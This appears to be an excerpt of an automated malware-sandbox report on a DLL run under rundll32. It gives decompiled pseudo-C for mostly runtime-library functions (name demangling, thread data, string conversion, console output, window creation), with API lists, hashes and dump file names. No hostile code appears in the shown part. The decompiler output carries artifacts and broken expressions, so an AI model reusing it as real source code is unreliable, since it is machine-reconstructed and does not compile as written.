						__eflags = _t82;
						if(_t82 == 0) {
							goto L15;
						}
						_t83 = _t82 - 0x41;
						__eflags = _t83;
						if(_t83 == 0) {
							_t31 = _t101 + 1; // -1
							 *0x1004e004 = _t31;
							E1000A54C(_a4, _t109);
							L5:
							goto L6;
						}
						_t86 = _t83 - 1;
						__eflags = _t86;
						if(_t86 == 0) {
							_t29 = _t101 + 1; // -1
							 *0x1004e004 = _t29;
							E1000B409(__ebx, _t109, _a4, _t109, 1);
							goto L16;
						}
						__eflags = _t86 != 1;
						if(_t86 != 1) {
							goto L37;
						}
						_t22 = _t101 + 1; // -1
						_v20 = 0;
						 *0x1004e004 = _t22;
						_v16 = 0;
						E10008D42(_a4, E10009403(_t101,  &_v12, _t109, 0,  &_v20, 0));
						goto L17;
					}
					__eflags = _t58;
					if(_t58 != 0) {
						goto L37;
					}
					goto L15;
				}
				_t109 = _a8;
				_t95 = _t57 - 0x1d;
				if(_t95 == 0) {
					L11:
					_push(2);
					goto L12;
				}
				if(_t95 == 1) {
					_t107 =  &_v12;
					_push( &_v20);
					__eflags =  *_t109;
					if( *_t109 == 0) {
						_v20 = "volatile";
						_v16 = 8;
					} else {
						_v20 = "volatile ";
						_v16 = 9;
					}
					E10007500(_t107);
					_t101 =  *0x1004e004; // 0x0
					goto L11;
				}
				E10008D42(_a4, _t109);
				goto L5;
			}

APIs

shared_ptr.LIBCMT ref: 1000B255
operator+.LIBVCRUNTIME ref: 1000B2A5
operator+.LIBVCRUNTIME ref: 1000B38C
shared_ptr.LIBCMT ref: 1000B3F7

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: operator+shared_ptr
String ID:
API String ID: 864562889-0
Opcode ID: e6218108176b14940d3872b46b66bed8babf2f70d609e583f29d53091d4cb5cb
Instruction ID: 93e7bdd40a4f091c83d39b0a35ead360230e477b65409987ed75284ff6752577
Opcode Fuzzy Hash: e6218108176b14940d3872b46b66bed8babf2f70d609e583f29d53091d4cb5cb
Instruction Fuzzy Hash: F8517D7180495AEFEB00CFA8C945AAE7BF4FB053C0F20856AE81997219D776DB41CB45

Uniqueness

Uniqueness Score: -1.00%

Function 1000A248, Relevance: 6.1, APIs: 4, Instructions: 144
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1000A248(signed int* _a4, intOrPtr* _a8, char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v28;
				void* _t46;
				intOrPtr _t47;
				signed int* _t48;
				intOrPtr* _t49;
				void* _t50;
				intOrPtr _t53;
				intOrPtr _t57;
				char* _t60;
				char* _t62;
				signed int* _t69;
				intOrPtr _t70;
				intOrPtr _t74;
				signed int _t80;
				intOrPtr _t87;
				intOrPtr* _t88;
				signed int _t89;
				signed int _t91;
				signed int _t94;

				_t87 =  *0x1004e004; // 0x0
				_t88 = _t87 + 1;
				 *0x1004e004 = _t88;
				_t74 =  *_t88;
				_t94 = 0;
				_t70 = _t74;
				_v12 = 0;
				_t91 = 0;
				_v8 = 0;
				_t46 = _t70 - 0x41;
				if(_t46 == 0) {
					if(_a16 != 0) {
						L32:
						_t42 = _t88 + 1; // 0x1
						_t47 = _t42;
						L33:
						 *0x1004e004 = _t47;
						_t48 = _a4;
						_t48[1] = _t94;
						L34:
						 *_t48 = _t94;
						L35:
						return _t48;
					}
					_t49 = _a8;
					if( *_t49 == 2 ||  *_t49 == 3) {
						 *_t49 = 5;
						goto L31;
					} else {
						if( *_t49 != 1) {
							goto L32;
						}
						 *_t49 = 4;
						L31:
						_t88 =  *0x1004e004; // 0x0
						goto L32;
					}
				}
				_t50 = _t46 - 1;
				if(_t50 == 0) {
					if(_a16 == 0) {
						 *_a12 = 1;
						E10008798( &_v12, 0x3e);
						L24:
						_t53 =  *0x1004e004; // 0x0
						_t47 = _t53 + 1;
						goto L33;
					}
					L22:
					_t48 = _a4;
					_t48[1] = _t94;
					_t48[1] = 2;
					goto L34;
				}
				if(_t50 == 1) {
					 *_a8 = 5;
					goto L24;
				}
				if(_t74 == 0) {
					L19:
					E100072DE(_a4, 1);
					_t48 = _a4;
					goto L35;
				}
				_t57 =  *((intOrPtr*)(_t88 + 1));
				if(_t57 == 0) {
					goto L19;
				}
				if(_a16 != 0) {
					goto L22;
				}
				_t5 = _t70 - 0x30; // -48
				_t6 = _t88 + 2; // 0x3
				 *0x1004e004 = _t6;
				_t73 = _t57 + 0xffffffd0 + (_t5 << 4);
				if(_t57 + 0xffffffd0 + (_t5 << 4) > 1) {
					E10008798( &_v12, 0x2c);
					_t69 = E100076A6( &_v12,  &_v28, E100073B4( &_v20, _t73, 0));
					_t94 =  *_t69;
					_t91 = _t69[1];
				}
				_v20 = _t94;
				_v16 = _t91;
				E100077F7( &_v20, 0x3e);
				_t60 =  *0x1004e004; // 0x0
				_t89 = _v20;
				_t80 = _v16;
				_v12 = _t89;
				_v8 = _t80;
				if( *_t60 != 0x24) {
					_v16 = _t80;
					_v20 = _t89;
					E100077F7( &_v20, 0x5e);
					_t89 = _v20;
					_t80 = _v16;
					_t62 =  *0x1004e004; // 0x0
					_v12 = _t89;
					_v8 = _t80;
				} else {
					_t62 = _t60 + 1;
					 *0x1004e004 = _t62;
				}
				if( *_t62 == 0) {
					if(_t80 <= 1) {
						if(_t89 == 0) {
							E10007596( &_v12, 1);
						} else {
							E10006F36( &_v12, 0x100438b4);
						}
						_t89 = _v12;
						_t80 = _v8;
					}
				} else {
					 *0x1004e004 = _t62 + 1;
				}
				_t48 = _a4;
				 *_t48 = _t89;
				_t48[1] = _t80 | 0x00004000;
				goto L35;
			}

APIs

DName::DName.LIBVCRUNTIME ref: 1000A2D0

Part of subcall function 100073B4: __aulldvrm.LIBCMT ref: 100073E5

DName::operator+.LIBCMT ref: 1000A2DD
DName::operator=.LIBVCRUNTIME ref: 1000A35D
DName::DName.LIBVCRUNTIME ref: 1000A37D

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: NameName::$Name::operator+Name::operator=__aulldvrm
String ID:
API String ID: 2448499823-0
Opcode ID: 90b53fb15ac9b4906040d35faff781823134f217f45143ff32974585a6f67a62
Instruction ID: 4432753ead1cd1f4d13ab9af0bf177137c14a2538a54f020a321214d9f530d75
Opcode Fuzzy Hash: 90b53fb15ac9b4906040d35faff781823134f217f45143ff32974585a6f67a62
Instruction Fuzzy Hash: 1D519E74D04255DFEB05CF58CA80A9EBBF4FB46380F10829AF9159B259D7B0AF80CB91

Uniqueness

Uniqueness Score: -1.00%

Function 100269CF, Relevance: 6.1, APIs: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100269CF(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t29;
				char _t31;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					_t31 = 0;
					__eflags =  *_t40;
					if( *_t40 != 0) {
						_t16 = E10028BDD(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t16;
						if(__eflags != 0) {
							_t38 = _a8;
							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t17 = E10028BDD(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
								__eflags = _t17;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
									_t19 = 0;
									__eflags = 0;
								} else {
									E10024468(GetLastError());
									_t19 =  *((intOrPtr*)(E1002449E(__eflags)));
								}
								L14:
								return _t19;
							}
							_t19 = E10027754(_t38, __eflags, _t16);
							__eflags = _t19;
							if(_t19 != 0) {
								goto L14;
							}
							goto L11;
						}
						E10024468(GetLastError());
						return  *((intOrPtr*)(E1002449E(__eflags)));
					}
					_t41 = _a8;
					__eflags =  *((intOrPtr*)(_t41 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
						L2:
						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
						return 0;
					}
					_t29 = E10027754(_t41, __eflags, 1);
					__eflags = _t29;
					if(_t29 != 0) {
						return _t29;
					}
					goto L6;
				}
				_t41 = _a8;
				E10027720(_t41);
				_t31 = 0;
				 *((intOrPtr*)(_t41 + 8)) = 0;
				 *((intOrPtr*)(_t41 + 0xc)) = 0;
				goto L2;
			}

APIs

Part of subcall function 10027720: _free.LIBCMT ref: 1002772E

Part of subcall function 10028BDD: WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000001,1002B316,10032FF6,0000FDE9,00000000,?,?,?,10032D5E,0000FDE9,00000000,?), ref: 10028C89

GetLastError.KERNEL32 ref: 10026A37
__dosmaperr.LIBCMT ref: 10026A3E
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 10026A7D
__dosmaperr.LIBCMT ref: 10026A84

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: dafd7d44092715414cc22d533bd9d2ee6f711b83f96ec667994af98859a43765
Instruction ID: bd05e1bc39f87d2aee2b562c84437264c3a7a5bb9226fc401e292b52289c8790
Opcode Fuzzy Hash: dafd7d44092715414cc22d533bd9d2ee6f711b83f96ec667994af98859a43765
Instruction Fuzzy Hash: BE21C575600216BFD710DFA5AC8195BB7ECFF093A47A2C529F919A7151DB30FC408BA1

Uniqueness

Uniqueness Score: -1.00%

Function 10023FB6, Relevance: 6.1, APIs: 4, Instructions: 72
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 75%

			E10023FB6(void* __ecx, void* __edx) {
				void* __ebx;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x1004d0a0; // 0xffffffff
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E1002A104(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E10026850(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E1002A104(__eflags,  *0x1004d0a0, _t51);
							if(__eflags != 0) {
								E10023C29(_t51, 0x1004e3b0);
								E100268B3(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E1002A104(__eflags,  *0x1004d0a0, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E1002A104(0,  *0x1004d0a0, 0);
							_push(0);
							L9:
							E100268B3();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E1002A0C5(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x1004d0a0; // 0xffffffff
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E10012120(_t39, _t43, _t49, _t60);
					asm("int3");
					_t5 =  *0x1004d0a0; // 0xffffffff
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E1002A104(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E10026850(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E1002A104(__eflags,  *0x1004d0a0, _t60);
								if(__eflags != 0) {
									E10023C29(_t60, 0x1004e3b0);
									E100268B3(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E1002A104(__eflags,  *0x1004d0a0, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E1002A104(__eflags,  *0x1004d0a0, _t20);
								_push(_t60);
								L25:
								E100268B3();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E1002A0C5(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0x1004d0a0; // 0xffffffff
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E10012120(_t39, _t43, _t49, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x1004d0a0; // 0xffffffff
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E1002A104(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E10026850(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E1002A104(__eflags,  *0x1004d0a0, _t54);
											if(__eflags != 0) {
												E10023C29(_t54, 0x1004e3b0);
												E100268B3(0);
												goto L45;
											} else {
												_t40 = 0;
												E1002A104(__eflags,  *0x1004d0a0, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E1002A104(0,  *0x1004d0a0, 0);
											_push(0);
											L41:
											E100268B3();
											goto L36;
										}
									}
								} else {
									_t54 = E1002A0C5(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x1004d0a0; // 0xffffffff
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

APIs

GetLastError.KERNEL32(?,70D9FFF6,?,1000F7D4,70D9FFF6,?,00000000,?,1000E78E,10042340,70D9FFF6,00000000,00000000), ref: 10023FBB
_free.LIBCMT ref: 10024018
_free.LIBCMT ref: 1002404E
SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,1000E78E,10042340,70D9FFF6,00000000,00000000), ref: 10024059

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: a1aad8c9c926d5f200dfc129fa4bf32ee5e2d12d2605714079376170c75a9ece
Instruction ID: 23280f8c2260b11c3a06f993c25238af481de1058feaba7f8c12448f37a63b00
Opcode Fuzzy Hash: a1aad8c9c926d5f200dfc129fa4bf32ee5e2d12d2605714079376170c75a9ece
Instruction Fuzzy Hash: AE11E3367042052FE241E7647EC6E1B22A9DBC26B4BE30235FB24D32E2DD319C918524

Uniqueness

Uniqueness Score: -1.00%

Function 1002410D, Relevance: 6.1, APIs: 4, Instructions: 69
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E1002410D(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0x1004d0a0; // 0xffffffff
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E1002A104(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E10026850(1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E1002A104(__eflags,  *0x1004d0a0, _t18);
							if(__eflags != 0) {
								E10023C29(_t18, 0x1004e3b0);
								E100268B3(0);
								goto L13;
							} else {
								_t13 = 0;
								E1002A104(__eflags,  *0x1004d0a0, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E1002A104(0,  *0x1004d0a0, 0);
							_push(0);
							L9:
							E100268B3();
							goto L4;
						}
					}
				} else {
					_t18 = E1002A0C5(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x1004d0a0; // 0xffffffff
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}

APIs

GetLastError.KERNEL32(00000000,70D9FFF6,00000000,100244A3,1000FB64,1000E746,00000000,00000000), ref: 10024112
_free.LIBCMT ref: 1002416F
_free.LIBCMT ref: 100241A5
SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF), ref: 100241B0

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 731426067ea15b7500fd783031a9d42682068e30897745dd2089e4c5b4501170
Instruction ID: 57a6f9a0da5a3930e0307264933162919cbfd296d3a065086be207032b37c94b
Opcode Fuzzy Hash: 731426067ea15b7500fd783031a9d42682068e30897745dd2089e4c5b4501170
Instruction Fuzzy Hash: 8611A53A3016516FE601E6757DC6F1B36A9DBD26B4FE30235F924D32E2DE219CA18114

Uniqueness

Uniqueness Score: -1.00%

Function 10023E5B, Relevance: 6.1, APIs: 4, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E10023E5B(void* __ecx) {
				intOrPtr _t3;
				signed int _t4;
				signed int _t6;
				signed int _t13;
				signed int _t14;
				long _t21;
				signed int _t23;

				_t21 = GetLastError();
				_t3 =  *0x1004d0a0; // 0xffffffff
				_t27 = _t3 - 0xffffffff;
				if(_t3 == 0xffffffff) {
					L4:
					_t4 = E1002A104(__eflags, _t3, 0xffffffff);
					__eflags = _t4;
					if(_t4 != 0) {
						_t23 = E10026850(1, 0x364);
						__eflags = _t23;
						if(__eflags != 0) {
							_t6 = E1002A104(__eflags,  *0x1004d0a0, _t23);
							__eflags = _t6;
							if(_t6 != 0) {
								E10023C29(_t23, 0x1004e3b0);
								E100268B3(0);
								_t14 = _t23;
							} else {
								_t14 = 0;
								__eflags = 0;
								E1002A104(0,  *0x1004d0a0, 0);
								_push(_t23);
								goto L10;
							}
						} else {
							_t14 = 0;
							E1002A104(__eflags,  *0x1004d0a0, 0);
							_push(0);
							L10:
							E100268B3();
						}
					} else {
						_t14 = 0;
					}
				} else {
					_t13 = E1002A0C5(_t27, _t3);
					if(_t13 == 0) {
						_t3 =  *0x1004d0a0; // 0xffffffff
						goto L4;
					} else {
						_t1 = _t13 + 1; // 0x1
						asm("sbb ebx, ebx");
						_t14 =  ~_t1 & _t13;
					}
				}
				SetLastError(_t21);
				return _t14;
			}

APIs

GetLastError.KERNEL32 ref: 10023E5F
_free.LIBCMT ref: 10023EE0
SetLastError.KERNEL32(00000000), ref: 10023F01

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 445ed5583abc66aff0091bdda5422eaa6d15ea046edcdaec4caaf5e3fdfc071f
Instruction ID: e08d1e95c12827319e42ff99bf0cbd6eb4c5bc448b54ed9f77757ffd9b9b94e2
Opcode Fuzzy Hash: 445ed5583abc66aff0091bdda5422eaa6d15ea046edcdaec4caaf5e3fdfc071f
Instruction Fuzzy Hash: DF1104357053226FEB10E7B4BEC6F1B3798DB022B8BE20235FD10D21E2DE546C4A9164

Uniqueness

Uniqueness Score: -1.00%

Function 100012B1, Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100012B1(struct HINSTANCE__* _a4, int _a8) {
				signed int _v8;
				void* _v140;
				struct _OSVERSIONINFOA _v156;
				void* __ebp;
				signed int _t8;
				void* _t22;
				struct HINSTANCE__* _t25;
				struct HWND__* _t26;
				signed int _t27;

				_t8 =  *0x1004d054; // 0xda1f8931
				_v8 = _t8 ^ _t27;
				_t25 = _a4;
				 *0x1004db64 = _t25;
				_v156.dwOSVersionInfoSize = 0x94;
				GetVersionExA( &_v156);
				_t13 =  ==  ? 1 :  *0x1004dc35 & 0x000000ff;
				 *0x1004dc35 =  ==  ? 1 :  *0x1004dc35 & 0x000000ff;
				_t26 = CreateWindowExA(0, 0x1004dbd0, 0x1004db68, 0xcf0000, 0x80000000, 0, 0x80000000, 0, 0, 0, _t25, 0);
				if(_t26 != 0) {
					ShowWindow(_t26, _a8);
					UpdateWindow(_t26);
				}
				return E100037EA(1, _v8 ^ _t27, _t22);
			}

0x100012ba
0x100012c1
0x100012c5
0x100012d0
0x100012d6
0x100012e0
0x100012f7
0x10001301
0x10001324
0x10001328
0x1000132e
0x10001335
0x1000133b
0x1000134a

APIs

GetVersionExA.KERNEL32(?), ref: 100012E0
CreateWindowExA.USER32 ref: 1000131E
ShowWindow.USER32(00000000,?), ref: 1000132E
UpdateWindow.USER32 ref: 10001335

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: Window$CreateShowUpdateVersion
String ID:
API String ID: 738887465-0
Opcode ID: 77d7adeb2b38e3cd895246d4cacae244cc3e5b3733acf5e48cb798dca9cd61a3
Instruction ID: 341d4f5b6357358a1a841b5e4f677a2f36a9486d77b2b7535788157dddeffb30
Opcode Fuzzy Hash: 77d7adeb2b38e3cd895246d4cacae244cc3e5b3733acf5e48cb798dca9cd61a3
Instruction Fuzzy Hash: 3F01B571610138BFE7149B24CE89FAB7BACEB46200F41415AF905D3210CB70AE45CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 1000144D, Relevance: 6.0, APIs: 4, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E1000144D(void* __ecx, void* __edx, struct HWND__* _a4, char _a12, intOrPtr _a16) {
				intOrPtr _v8;
				char _v12;
				void* _t23;

				_t23 = __edx;
				if((GetMenuState(GetSubMenu(GetMenu(_a4), 1), 0xcb, 0) & 0x00000008) != 0) {
					RedrawWindow(_a4, 0, 0, 0x105);
					E10001CFA(0x1004dc38);
					_v12 = _a12;
					_v8 = _a16;
					_push( &_v12);
					E10001102(_t23,  *0x1004dc38);
					 *0x1004dc34 = 1;
				}
				return 0;
			}

0x1000144d
0x10001476
0x10001482
0x1000148f
0x10001499
0x1000149f
0x100014a5
0x100014ac
0x100014b1
0x100014b1
0x100014bc

APIs

GetMenu.USER32 ref: 10001456
GetSubMenu.USER32 ref: 1000145F
GetMenuState.USER32(00000000,000000CB,00000000), ref: 1000146E
RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 10001482

Part of subcall function 10001102: _Deallocate.LIBCONCRT ref: 1000113A

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: Menu$DeallocateRedrawStateWindow
String ID:
API String ID: 2380408669-0
Opcode ID: 970e6ee6165374ff70056ff367cbba4755ef3d9930bf192b7c9da9b34f450319
Instruction ID: be1ad7771bc6ae16dbc7eccf9958df4cdf15cb777987d046380b36b05f21978e
Opcode Fuzzy Hash: 970e6ee6165374ff70056ff367cbba4755ef3d9930bf192b7c9da9b34f450319
Instruction Fuzzy Hash: D2F03C74601229BBEB11AF64CE8DECB3EA9EF06790F404055F905E6160DAB09941CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 1003B8D4, Relevance: 6.0, APIs: 4, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1003B8D4(void** _a4) {
				void* _t12;
				void** _t13;

				_t13 = _a4;
				_t12 = WriteConsoleW( *0x1004d8f0,  *_t13, _t13[1], _t13[2], 0);
				if(_t12 == 0 && GetLastError() == 6) {
					E1003B9A3();
					E1003B965();
					_t12 = WriteConsoleW( *0x1004d8f0,  *_t13, _t13[1], _t13[2], _t12);
				}
				return _t12;
			}

0x1003b8da
0x1003b8f4
0x1003b8f8
0x1003b905
0x1003b90a
0x1003b924
0x1003b924
0x1003b92b

APIs

WriteConsoleW.KERNEL32 ref: 1003B8EE
GetLastError.KERNEL32 ref: 1003B8FA

Part of subcall function 1003B9A3: CloseHandle.KERNEL32(FFFFFFFE), ref: 1003B9B3

___initconout.LIBCMT ref: 1003B90A

Part of subcall function 1003B965: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000), ref: 1003B978

WriteConsoleW.KERNEL32 ref: 1003B91E

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 685eef77ad1800851d9f857d5739ebb636a0bac401fd8fe300b65c4c84b708e6
Instruction ID: 383a7036c8f4c86a359b566b59d293377cabd9f826cc08592a6f7cb210b54fdd
Opcode Fuzzy Hash: 685eef77ad1800851d9f857d5739ebb636a0bac401fd8fe300b65c4c84b708e6
